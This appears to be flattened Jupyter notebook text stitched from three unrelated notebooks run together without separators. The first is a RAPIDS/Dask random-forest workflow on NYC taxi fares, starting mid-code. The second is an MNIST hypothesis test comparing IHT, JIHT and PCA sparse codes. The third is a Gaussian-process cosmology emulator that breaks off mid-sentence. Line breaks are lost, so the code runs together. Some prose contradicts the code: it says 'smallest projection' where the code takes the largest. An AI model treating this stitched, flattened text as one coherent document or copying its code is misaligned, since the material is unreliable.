axis =1) df = df.apply_rows(haversine_distance_kernel, incols=['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude'], outcols=dict(h_distance=np.float32), kwargs=dict()) df = df.apply_rows(day_of_the_week_kernel, incols=['day', 'month', 'year'], outcols=dict(day_of_week=np.float32), kwargs=dict()) df['is_weekend'] = (df['day_of_week']<2) return dfTrain RF modelWe are now ready to fit a Random Forest on the data to predict the fare for the trip.cu_rf_params = { 'n_estimators': 100, 'max_depth': 16, }The cell below creates a client with the cluster we defined earlier in the notebook. Note that we have `cluster.scale`. This is the step where the workers are allocated.Once workers become available, we can now run the rest of our workflow - reading and cleaning the data, splitting into training and validation sets, fitting a RF model and predicting on the validation set. We print out the MSE metric for this problem. Note that for better performance we should perform HPO ideally. Refer to the notebooks in the repository for how to perform automated HPO [using RayTune](https://github.com/rapidsai/cloud-ml-examples/blob/main/ray/notebooks/Ray_RAPIDS_HPO.ipynb) and [using Optuna](https://github.com/rapidsai/cloud-ml-examples/blob/main/optuna/notebooks/optuna_rapids.ipynb).with Client(cluster) as client: print("Start Workflow") cluster.scale(2) client.wait_for_workers(4) print("Step 0 - Got Workers") print(client) base_path = 'gcs://anaconda-public-data/nyc-taxi/csv/' df_2014 = dask_cudf.read_csv(base_path+'2014/yellow_tripdata_2014*.csv', n_rows=20000) print("Step 1 - Finished reading file") df_2014 = clean(df_2014, remap, must_haves) # Query the dataframe to clean up the outliers query_frags = [ 'fare_amount > 0 and fare_amount < 500', 'passenger_count > 0 and passenger_count < 6', 'pickup_longitude > -75 and pickup_longitude < -73', 'dropoff_longitude > -75 and dropoff_longitude < -73', 'pickup_latitude > 40 and pickup_latitude < 42', 'dropoff_latitude > 40 and dropoff_latitude < 42' ] df_2014 = df_2014.query(' and '.join(query_frags)) print("Step 2 - Cleaned data and removed outliers") taxi_df = df_2014.map_partitions(add_features) print("Step 3 - Added features") taxi_df = taxi_df.dropna() taxi_df = taxi_df.astype("float32") from dask_ml.model_selection import train_test_split from cuml.dask.common import utils as dask_utils X, y = taxi_df.drop(["fare_amount"], axis=1), taxi_df["fare_amount"].astype('float32') X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, shuffle=True) print("Step 4 - Split data") workers = client.has_what().keys() X_train, X_test, y_train, y_test = dask_utils.persist_across_workers(client, [X_train, X_test, y_train, y_test], workers=workers) from cuml.dask.ensemble import RandomForestRegressor cu_dask_rf = RandomForestRegressor(ignore_empty_partitions=True) cu_dask_rf = cu_dask_rf.fit(X_train, y_train) wait(cu_dask_rf.rfs) print("Step 5 - Fitted RF") y_pred = cu_dask_rf.predict(X_test) print("Step 6 - Predicted on test set") _y_pred, _y_test = y_pred.compute().to_array(), y_test.compute().to_array() print("Step 7 - Calculating MSE") from cuml.metrics import mean_squared_error score = mean_squared_error(_y_pred, _y_test) print("Workflow Complete - RMSE: ", np.sqrt(score)) client.close() cluster.close()Hypothesis Test - does joint sparsity bring any benefit?In this notebook we examine weather joint sparsity has any benefit over standard sparse coding techniques for classification. The rough idea is that a joint sparse forward pass will learn a code or representation for the a data point that takes into account other examples of the same class. In effect then we are trying to map all members of a given class onto a particular subspace. To test the benefits we consider two tests:- classification: we perform classification by taking the set of sparse representations of a class and then perform SVD, so as to identify say the top 5 singular vectors that span a linear space that in some sense represents the given class label in the encoder space. We benchmark against standard IHT and PCA.- reconstruction / decoding: we observe the reconstruction rate for JIHT vs IHT and PCA. It is expected that IHT should have a better reconstruction error. Methodology For classification:For the IHT/ JIHT:- we train a model on MNIST with an IHT/ JIHT forward pass- we then run the entire MNIST traing set through the modelto find all the training data point encodings- group the encodings by class, and carry out SVD to find the j singular vectors. These j linear vectors define a linear manifold or subspace which we 'associate' with the class- then run the entire test set through the model to find all the test data point encodings- classify each test data point by assigning into the class whose linear manifold or subspace is closest to the data points encoding by projectingPCA benchmarking approach:- Find the j principal components of the training data set for each class- Project the test data onto each of the sets of j principal components of each class- Assign a test data point to the class for which it has the largest projection (shortest distance) Then compare them all by looking at the percentage of data points that they correctly categorised. For reconstruction:For the IHT/ JIHT:- Simple: forward pass and then reverse pass, calculate l2 distance between decoded and original data point. Calculate the percentage error over the entire test set and training set. Also plot to inpect visuallyPCA benchmarking approach:- Calculate the m principal components of the training data set (these act as our atoms)- For each data point encode it as the sum of the K principal components that the data point is closest (calculate the inner product between the data point and each principal component, select largest K- reconstruct data point or image from just these K principal componentsCompare the total reconstruction error betweenIHT, JIHT and PCA for both the test and training data sets. Import MNIST DataFirst script simply imports the MNIST training and test dataimport numpy as np from numpy import linalg as LA from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from sklearn.decomposition import PCA import random import os import yaml import importlib import torch import torch.nn as nn import torchvision import torchvision.datasets as dsets import torchvision.transforms as transforms from torch.autograd import Variable from torch.utils.data.sampler import SubsetRandomSampler from skimage import data, color from skimage.transform import rescale, resize, downscale_local_mean device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") # Parameters rep_batch_size = 20000 test_batch_size = 2000 # Set the maximum dimension of the linear manifolds for each class L=50 # Sparsity value for pca numb_atoms = 500 K=50 # Load MNIST root = './data' download = True # download MNIST dataset or not # Access MNIST dataset and define processing transforms to proces trans = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]) # trans = transforms.Compose([transforms.ToTensor()]) train_data = dsets.MNIST(root=root, train=True, transform=trans, download=download) test_data = dsets.MNIST(root=root, train=False, transform=trans) train_loader = torch.utils.data.DataLoader( dataset=train_data, batch_size=rep_batch_size, sampler = None, shuffle=True) test_loader = torch.utils.data.DataLoader( dataset=test_data, batch_size=test_batch_size, shuffle=True)Prepare training and test data to be used in models and hypothesis tests.# Format data so that can be run through model train_x, train_labels = next(iter(train_loader)) b_train_x = (train_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) b_train_labels = (train_labels).to(device) # mean_train_x = torch.mean(temp, dim=0, keepdim=True) # b_train_x = temp - mean_train_x test_x, test_labels = next(iter(test_loader)) b_test_x = (test_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) b_test_labels = (test_labels).to(device) # temp = (test_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) # mean_test_x = torch.mean(b_test_x, dim=0, keepdim=True) # b_test_x = temp - mean_train_x # # Plot picture of means removed # fig = plt.figure(figsize=(5,5)) # plt.subplot(1, 2, 1) # plt.imshow(np.reshape(mean_train_x.cpu().data.numpy(), (28, 28)), cmap='gray') # plt.subplot(1, 2, 2) # plt.imshow(np.reshape(mean_test_x.cpu().data.numpy(), (28, 28)), cmap='gray') # plt.show() # Sort data into classes so that can be processed for classification test label_bin_data = {"0":[], "1":[], "2":[], "3":[], "4":[], "5":[], "6":[], "7":[], "8":[], "9":[]} data_by_class = {} test_label_bin_data = {"0":[], "1":[], "2":[], "3":[], "4":[], "5":[], "6":[], "7":[], "8":[], "9":[]} test_data_by_class = {} # Firstly sort data into different classes, where each dictionary member is a list of data points for i in range(b_train_labels.size()[0]): label_bin_data[str(int(b_train_labels[i].item()))].append(b_train_x[i,:]) # Format dictionary so each dictionary element is a matrix of data points for key, tensor_list in label_bin_data.items(): if len(label_bin_data[key]) > 0: data_by_class[key] = torch.stack(label_bin_data[key], dim=0) # # Sort test data into different classes to observe different performance # for i in range(b_test_labels.size()[0]): # test_label_bin_data[str(int(b_test_labels[i].item()))].append(b_test_x[i,:]) # # Format dictionary so each dictionary element is a matrix of data points # for key, tensor_list in test_label_bin_data.items(): # if len(test_label_bin_data[key]) > 0: # test_data_by_class[key] = torch.stack(test_label_bin_data[key], dim=0)IHT Model IHT Reconstruction Firstly just load the IHT model and check few examples for visual inspection:# Load mode import auxillary as aux importlib.reload(aux) N_TEST_IMG = 5 iht_model_id = '478937' #'570864' iht_model_filename = 'IHT' + iht_model_id iht_model = aux.load_model(iht_model_filename) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) iht_test_decoded, encoded, errIHT = iht_model(view_data) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(iht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') plt.show()Calculate overall train and test reconstruction error:# Process entire data set for the reconstruction test train_decoding, train_encoding, errIHT_train = iht_model(b_train_x) test_decoding, test_encoding, errIHT_test = iht_model(b_test_x) print('Train error: ', errIHT_train[-1]) print('Test error: ', errIHT_test[-1])Train error: 0.24826978147 Test error: 0.246386528015IHT Classification We are trying to calculate the low dimensional manifold that best represents each class in the encoded space space. To do this we calculate a set of encodings for each class, and then carry out SVD on this class to find a low dimensional linear manifold which each member of that class at least roughly lies on.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class iht_class_codes = {} iht_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: _, iht_class_codes[key], _ = iht_model(data_by_class[key]) temp_npy = np.asarray(iht_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) iht_class_svd[key] = U[:,:L] # print(data_by_class[key].shape) # print(iht_class_codes[key].shape) # print(U.shape) # print(iht_class_svd[key].shape)With the linear manifold calculated for each class test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to).# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) # Create sparse code for each test data point _, iht_test_codes,_ = iht_model(b_test_x) print(iht_test_codes.shape) for key, tensor_list in iht_class_svd.items(): if len(iht_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(iht_test_codes, iht_class_svd[key])**2, axis=1)) label_estimates_iht = np.argmax(x_test_proj, axis=1) class_error_rate_iht = 100*(1 - np.sum(np.sum(label_estimates_iht == b_test_labels.data.numpy()))/test_batch_size) print("IHT classification error rate via the projection method: ", class_error_rate_iht, "%")torch.Size([2000, 500]) IHT classification error rate via the projection method: 5.8 %Breakdown of classification error by class:true = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_iht[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 iht_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(iht_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 1.1% Class 1 - classification error: 0.0% Class 2 - classification error: 10.5% Class 3 - classification error: 8.0% Class 4 - classification error: 5.1% Class 5 - classification error: 11.9% Class 6 - classification error: 2.1% Class 7 - classification error: 8.3% Class 8 - classification error: 7.1% Class 9 - classification error: 4.5%JIHT Model JIHT Reconstruction Firstly just load the JIHT model and check few examples for visual inspection.# Load mode import auxillary as aux importlib.reload(aux) N_TEST_IMG = 5 jiht_model_id = '486709' #'330096' #'35576'#'330096''102095' jiht_model_filename = 'JIHT' + jiht_model_id jiht_model = aux.load_model(jiht_model_filename) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) jiht_test_decoded, encoded, errJIHT = jiht_model.forward(view_data) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(jiht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') plt.show()Calculate overall train and test reconstruction error:# Process entire data set for the reconstruction test train_decoding, train_encoding, errJIHT_train = jiht_model(b_train_x) test_decoding, test_encoding, errJIHT_test = jiht_model(b_test_x) print('Train error: ', errJIHT_train[-1]) print('Test error: ', errJIHT_test[-1])Train error: 0.276716858149 Test error: 0.268991529942JIHT Classification We are trying to calculate the low dimensional manifold that best represents each class in the encoded space space. To do this we calculate a set of encodings for each class, and then carry out SVD on this class to find a low dimensional linear manifold which each member of that class at least roughly lies on.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class jiht_class_codes = {} jiht_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: _, jiht_class_codes[key], _ = jiht_model.forward(data_by_class[key]) temp_npy = np.asarray(jiht_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) jiht_class_svd[key] = U[:,:L]With the linear manifold calculated for each class test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to).# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) # Create sparse code for each test data point _, jiht_test_codes,_ = jiht_model(b_test_x) for key, tensor_list in jiht_class_svd.items(): if len(jiht_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(jiht_test_codes, jiht_class_svd[key])**2, axis=1)) label_estimates_jiht = np.argmax(x_test_proj, axis=1) class_error_rate_jiht = 100*(1 - np.sum(np.sum(label_estimates_jiht == b_test_labels.data.numpy()))/test_batch_size) print("JIHT classification error rate via the projection method: ", class_error_rate_jiht, "%")JIHT classification error rate via the projection method: 5.8 %One reason why JIHT may be underperfoming in the classification task is that although classes are people clustered well, there may not be a natural mechanism to ensure that classes are well seperated. One way in which we can test this is firstly analyse if there is any particular class that has a higher than average classification error rate, the other is to observe the supports of each and look at the overlaptrue = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_jiht[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 jiht_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(jiht_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 0.6% Class 1 - classification error: 0.0% Class 2 - classification error: 6.4% Class 3 - classification error: 11.0% Class 4 - classification error: 4.6% Class 5 - classification error: 13.1% Class 6 - classification error: 2.6% Class 7 - classification error: 7.9% Class 8 - classification error: 7.1% Class 9 - classification error: 6.1%PCA Model PCA Reconstruction To create a parrallel and fair benchmark with PCA we consider calculating in some sense an equivalent dictionary of linear basis elements as to those we learn with the IHT and JIHT during training. Then we enforce sparsity by projecting each test data point onto each of the principal components, and reconstruct by combining the largest 25 using the inner product as the coefficient.# Calculate PCA 'dictionary' pca = PCA(n_components=numb_atoms) pca.fit_transform(b_train_x) princ_components = pca.components_ print(princ_components.shape)(500, 784)Now that we have the 'dictionary' of vectors (principal components we calculate the inner product between each of the test data points and the atoms of the PCA dictionary. We reconstruct by doing the combining the K principal components in a linear combination with their respective inner products with the data point acting as coefficients. Might be better in some sense to find the coefficients by solving a linear system for each coefficient? This would either mean solving the thin matrix system for each data point or doing soem sort of sparse coding setup.N_TEST_IMG = 5 train_inner_products = np.matmul(princ_components, np.transpose(b_train_x.data.cpu().numpy())) order = np.sort(np.abs(train_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = train_inner_products>Kth_largest_elements pca_train_decoded = np.transpose(np.matmul(np.transpose(princ_components), mask*train_inner_products)) test_inner_products = np.matmul(princ_components, np.transpose(b_test_x.data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca_test_decoded = np.transpose(np.matmul(np.transpose(princ_components), mask*test_inner_products)) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(pca_test_decoded[i], (28, 28)), cmap='gray') plt.show()The reconstruction error across the test set is as follows.pca_train_error = np.linalg.norm(np.asarray(b_train_x) - pca_train_decoded,'fro') / np.linalg.norm(np.asarray(b_train_x),'fro') pca_test_error = np.linalg.norm(np.asarray(b_test_x) - pca_test_decoded,'fro') / np.linalg.norm(np.asarray(b_test_x),'fro') print('Train error: ', pca_train_error) print('Test error: ', pca_test_error)Train error: 0.650400993532 Test error: 0.645532561295PCA Classification - method 1 (based on reconstruction filters) This method is in some sense closer and fairer to what we do with IHT and JIHT. Here we project each test data point onto the set of pca components we have extracted and are using as a dictionary. Then we we take the SVD of this in the representation space to see weather the PCA forward pass at least approximatly maps data points onto lower dimension linear manifolds.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class pca1_class_codes = {} pca1_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: test_inner_products= np.matmul(princ_components, np.transpose(data_by_class[key].data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca1_class_codes[key] = mask*test_inner_products temp_npy = np.asarray(pca1_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) pca1_class_svd[key] = U[:,:L]With the linear manifold calculated for each class, test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to). The representation we have is essentially thresholding using the 500 largest PCA components from the training data set.# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) test_inner_products= np.matmul(princ_components, np.transpose(b_test_x.data.cpu().numpy())) order = np.sort(np.abs(test_inner_products), axis=0) Kth_largest_elements = order[K,:] mask = test_inner_products>Kth_largest_elements pca1_test_rep = test_inner_products*mask for key, tensor_list in pca1_class_svd.items(): if len(pca1_class_svd[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(pca1_test_rep , pca1_class_svd[key])**2, axis=1)) label_estimates_pca1 = np.argmax(x_test_proj, axis=1) class_error_rate_pca1 = 100*(1 - np.sum(np.sum(label_estimates_pca1 == b_test_labels.data.numpy()))/test_batch_size) print("PCA classification error rate via the projection method: ", class_error_rate_pca1, "%")PCA Classification - method 2 (not based on reconstruction filters) To make a fair benchmark for classification we once again use the sorted training data to create linear manifolds based of the largest L PCA components.pca_class = {} for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: temp_npy = np.asarray(data_by_class[key]) pca = PCA(n_components=L) pca.fit_transform(temp_npy) pca_class[key] = np.transpose(pca.components_)Now we perform analagous steps as before, however instead of projecting into some encoding space and our linear manifolds are in the image space in the case of PCA. We simply project each image onto each class linear manifold and assign it the label of the class that is closest. We could see this as assigning the principal components of a set of data points belonging to a class as the features or atoms for a given class. This is kind of similar to the idea of assigining a set of features to each filter. If we were to do this for IHT it would mean we train the particular filters for a class based on the examples of that class in the batch. Over many layers this belays the point that we have feature sharing, which is a key benefit of the efficiency and efficacy of CNNs.# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) for key, tensor_list in pca_class.items(): if len(pca_class[key]) > 0: x_test_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(b_test_x, pca_class[key])**2, axis=1)) label_estimates_pca = np.argmax(x_test_proj, axis=1) class_error_rate_pca = 100*(1 - np.sum(np.sum(label_estimates_pca == b_test_labels.data.numpy()))/test_batch_size) print("PCA classification error rate via the projection method: ", class_error_rate_pca, "%")PCA classification error rate via the projection method: 4.95 %It is informative to view the breakdown in error in terms of by class:true = b_test_labels.data.numpy() class_count = np.zeros((10,1)) class_correct_count = np.zeros((10,1)) for i in range(len(true)): if label_estimates_pca[i] == true[i]: class_correct_count[true[i]] = class_correct_count[true[i]] + 1 class_count[true[i]] = class_count[true[i]] + 1 pca_class_error = 100*(1-np.divide(class_correct_count, class_count)) print('Error rate by class') for i in range(10): temp = float(pca_class_error[i]) print("Class {a:.0f} - classification error: {b:.1f}%".format(a=i, b=temp))Error rate by class Class 0 - classification error: 0.0% Class 1 - classification error: 3.4% Class 2 - classification error: 5.9% Class 3 - classification error: 7.0% Class 4 - classification error: 4.1% Class 5 - classification error: 7.7% Class 6 - classification error: 2.6% Class 7 - classification error: 7.4% Class 8 - classification error: 4.9% Class 9 - classification error: 6.1%Side by side comparison ReconstructionN_TEST_IMG = 5 fig = plt.figure(figsize=(5, 4)) plt.figure(figsize=(20,20)) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("Original") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+6) plt.imshow(np.reshape(iht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("IHT") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+11) plt.imshow(np.reshape(jiht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("JIHT") for i in range(N_TEST_IMG): plt.subplot(4,N_TEST_IMG,i+16) plt.imshow(np.reshape(pca_test_decoded[i], (28, 28)), cmap='gray') if i == 0: plt.ylabel("PCA") print("IHT - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*errIHT_train[-1], b=100*errIHT_test[-1])) print("JIHT - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*errJIHT_train[-1], b=100*errJIHT_test[-1])) print("PCA - train error: {a:.2f}%, test error: {b:.2f}%".format(a=100*pca_train_error, b=100*pca_test_error))IHT - train error: 24.83%, test error: 24.64% JIHT - train error: 27.67%, test error: 26.90% PCA - train error: 65.04%, test error: 64.55%Classificationl = [5, 10, 15, 20, 25, int(L)] classification_error_rate_iht = np.zeros((len(l), 1)) x_test_iht_proj = np.zeros((test_batch_size, 10)) classification_error_rate_jiht = np.zeros((len(l), 1)) x_test_jiht_proj = np.zeros((test_batch_size, 10)) classification_error_rate_pca = np.zeros((len(l), 1)) x_test_pca_proj = np.zeros((test_batch_size, 10)) index = 0 for i in l: for key, tensor_list in iht_class_svd.items(): if len(iht_class_svd[key]) > 0: x_test_iht_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(iht_test_codes, iht_class_svd[key][:, :i])**2, axis=1)) label_estimates_iht = np.argmax(x_test_iht_proj, axis=1) classification_error_rate_iht[index] = 100*(1 - np.sum(np.sum(label_estimates_iht == b_test_labels.data.numpy()))/test_batch_size) for key, tensor_list in jiht_class_svd.items(): if len(jiht_class_svd[key]) > 0: x_test_jiht_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(jiht_test_codes, jiht_class_svd[key][:, :i])**2, axis=1)) label_estimates_jiht = np.argmax(x_test_jiht_proj, axis=1) classification_error_rate_jiht[index] = 100*(1 - np.sum(np.sum(label_estimates_jiht == b_test_labels.data.numpy()))/test_batch_size) for key, tensor_list in pca_class.items(): if len(pca_class[key]) > 0: x_test_pca_proj[:, int(key)] = np.sqrt(np.sum(np.matmul(b_test_x, pca_class[key][:, :i])**2, axis=1)) label_estimates_pca = np.argmax(x_test_pca_proj, axis=1) classification_error_rate_pca[index] = 100*(1 - np.sum(np.sum(label_estimates_pca == b_test_labels.data.numpy()))/test_batch_size) index = index+1 plt.figure(figsize=(10,10)) plt.plot(l, classification_error_rate_iht, label='IHT') plt.plot(l, classification_error_rate_jiht, label='JIHT') plt.plot(l, classification_error_rate_pca, label='PCA') plt.legend() plt.ylabel('Test classification Error (%)') plt.show() class_axis = np.arange(10) plt.figure(figsize=(10,10)) plt.scatter(class_axis, iht_class_error, label='IHT') plt.scatter(class_axis, jiht_class_error, label='JIHT') plt.scatter(class_axis, pca_class_error, label='PCA') plt.legend() plt.ylabel('Test classification Error (%)') plt.show()Emulator: Gaussian Process (`george`) Index1. [Import packages](imports)2. [Load data](loadData) 1. [Load train data](loadTrainData) 2. [Load test data](loadTestData)3. [Emulator method](emulator) 1. [Scale data](scaleData) 2. [Train emulator](trainEmu) 3. [Plot results](plotEmu) 1. Import packagesimport george import matplotlib.pyplot as plt import numpy as np import pandas as pd import pickle import scipy.optimize as op import seaborn as sns from sklearn.preprocessing import StandardScalerAesthetic settings%matplotlib inline sns.set(font_scale=1.3, style="ticks")2. Load dataRead the training data from a `.npy` file: 2.1. Load train data For the full demo, we'll use 1d data (a single input parameter/feature), but you can also try it the full 3d data; this just takes a long time to train, so you might want to load in our already saved results below to view it. Remember to load in the corresponding test data below.path_train = '../data/cosmology_train_1d.pickle' #path_train = '../data/cosmology_train.pickle' #path_train = '../data/cosmology_train_big.pickle' with open(path_train, 'rb') as input_file: data_train = pickle.load(input_file) input_train = data_train['input_data'] output_train = data_train['output_data'] number_train = input_train.shape[0] number_param = input_train.shape[1] - 1 n_values = output_train.shape[1]-1 print("Number of datapoints:", number_train) print("Number of input parameters:", number_param) # remove the `object_id` column extra_train = data_train['extra_input'] r_vals = extra_train['r_vals'] xs_train = input_train.drop(columns=['object_id']) ys_train = output_train.drop(columns=['object_id'])2.2. Load test datapath_test = '../data/cosmology_test_1d.pickle' #path_test = '../data/cosmology_test.pickle' with open(path_test, 'rb') as input_file: data_test = pickle.load(input_file) input_test = data_test['input_data'] output_test = data_test['output_data'] number_test = input_test.shape[0] print("Number of datapoints:", number_test) xs_test = input_test.drop(columns=['object_id']) ys_test = output_test.drop(columns=['object_id'])3. Emulator method 3.1. Scale dataLet's first scale our input parameters, to make training easier:scaler = StandardScaler() scaler.fit(xs_train) xs_train.iloc[:] = scaler.transform(xs_train) xs_test.iloc[:] = scaler.transform(xs_test) y_mean = np.mean(ys_train, axis=0) ys_train = ys_train/y_mean ys_test = ys_test/y_mean3.2. Train emulatordef fit_gp(kernel, xs, ys, xs_new): def neg_log_like(p): # Objective function: negative log-likelihood gp.set_parameter_vector(p) loglike = gp.log_likelihood(ys, quiet=True) return -loglike if np.isfinite(loglike) else 1e25 def grad_neg_log_like(p): # Gradient of the objective function. gp.set_parameter_vector(p) return -gp.grad_log_likelihood(ys, quiet=True) gp = george.GP(kernel) gp.compute(xs) results = op.minimize(neg_log_like, gp.get_parameter_vector(), jac=grad_neg_log_like, method="L-BFGS-B", tol=1e-6) gp.set_parameter_vector(results.x) gp_mean, gp_cov = gp.predict(ys, xs_new) return gp_meanHere we are going to train and predict the value straight away. (If you're loading in saved results, comment out the next 2 cells.)number_outputs = np.shape(ys_test)[1] print(number_outputs) ys_test_preds = ys_test.copy() ys_train_0 = ys_train.iloc[:, 0] for i in np.arange(number_outputs): print(i) ys_train_i = ys_train.iloc[:, i] kernel = np.var(ys_train_0) * george.kernels.ExpSquaredKernel(0.5, ndim=number_param) ys_pred = fit_gp(kernel=kernel, xs=xs_train, ys=ys_train_i, xs_new=xs_test) ys_test_preds.iloc[:, i] = ys_predUndo all the normalizations.ys_test = ys_test*y_mean ys_test_preds = ys_test_preds*y_meanSave results. (Commented out as results have already been saved.)path_save_results = f'emulator_results/output_pred_big_train_{number_param}d.pickle' #ys_test_preds.to_pickle(path_save_results)Verify the results were well saved. (If you're looking at the 3d data, you'll want to load this in here.)#ys_test_preds_saved = pd.read_pickle(path_save_results) #np.allclose(ys_test_preds_saved, ys_test_preds) #ys_test_preds = ys_test_preds_saved3.3. Plot resultsWe compare our predictions to the truth (choosing a subset for visual clarity).n_plot = int(0.2*number_test) idxs = np.random.choice(np.arange(number_test), n_plot) color_idx = np.linspace(0, 1, n_plot) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) for i in range(n_plot): ys_test_i = ys_test.iloc[idxs[i], :] ys_pred_i = ys_test_preds.iloc[idxs[i], :] if i==0: label_test = 'truth' label_pred = 'emu_prediction' else: label_test = None label_pred = None plt.plot(r_vals, ys_test_i, alpha=0.8, label=label_test, marker='o', markerfacecolor='None', ls='None', color=colors[i]) plt.plot(r_vals, ys_pred_i, alpha=0.8, label=label_pred, color=colors[i]) plt.xlabel('$r$') plt.ylabel(r'$\xi(r)$') plt.legend()We plot the fractional error of all test set statistics:color_idx = np.linspace(0, 1, number_test) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) frac_errs = np.empty((number_test, n_values)) for i in range(number_test): ys_test_i = ys_test.iloc[i, :] ys_pred_i = ys_test_preds.iloc[i, :] frac_err = (ys_pred_i-ys_test_i)/ys_test_i frac_errs[i] = frac_err plt.plot(r_vals, frac_err, alpha=0.8, color=colors[i]) plt.axhline(0.0, color='k') plt.xlabel('$r$') plt.ylabel(r'fractional error')We show 